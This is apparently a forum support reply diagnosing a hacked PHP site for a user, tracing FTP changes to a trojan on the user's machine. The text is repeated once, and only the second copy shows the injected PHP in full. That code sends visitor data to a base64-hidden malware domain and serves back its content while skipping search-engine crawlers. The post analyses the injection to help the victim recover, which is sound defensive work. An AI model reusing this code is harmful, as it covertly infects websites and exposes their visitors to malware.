@ntoupin
Thank you for granting me access to your server's CPanel.
The reason why I requested this access was that since the incidence you reported was a very recent one, if your server was indeed compromised, the web server's access logs would contain clues about the intrusion.
As it happens, your FTP log shows clearly such activity on the 17th. of March.
IP address 72.44.80.94 logged in through your FTP credentials and made changes to several files on your server (I am PMing you a list of all such files as some of them are still present on the server).
The modified files have this piece of code injected -
The basecoded string aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw leads up to http://adveconfirm.com/, a classified high-risk site that serves up malware (goolge for aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw and you'll find a slew of sites being affected by this trojan - most of them in the current month).
That clears up the mystery then.
Your local machine is infected and the trojan is using your FTP name/password to make modifications to PHP files on your server.
Please sanitize your machine, reset all your FTP accounts and change your FTP client.
Hope this helps. Thanks.
Thank you for granting me access to your server's CPanel.
The reason why I requested this access was that since the incidence you reported was a very recent one, if your server was indeed compromised, the web server's access logs would contain clues about the intrusion.
As it happens, your FTP log shows clearly such activity on the 17th. of March.
IP address 72.44.80.94 logged in through your FTP credentials and made changes to several files on your server (I am PMing you a list of all such files as some of them are still present on the server).
The modified files have this piece of code injected -
- Code: Select all
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)
&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)
&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)
&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)
&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){
// Create bot analitics
$stCurlLink = base64_decode(
'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMO
TE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['
HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET[
'look']);
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
The basecoded string aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw leads up to http://adveconfirm.com/, a classified high-risk site that serves up malware (goolge for aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw and you'll find a slew of sites being affected by this trojan - most of them in the current month).
That clears up the mystery then.
Your local machine is infected and the trojan is using your FTP name/password to make modifications to PHP files on your server.
Please sanitize your machine, reset all your FTP accounts and change your FTP client.
Hope this helps. Thanks.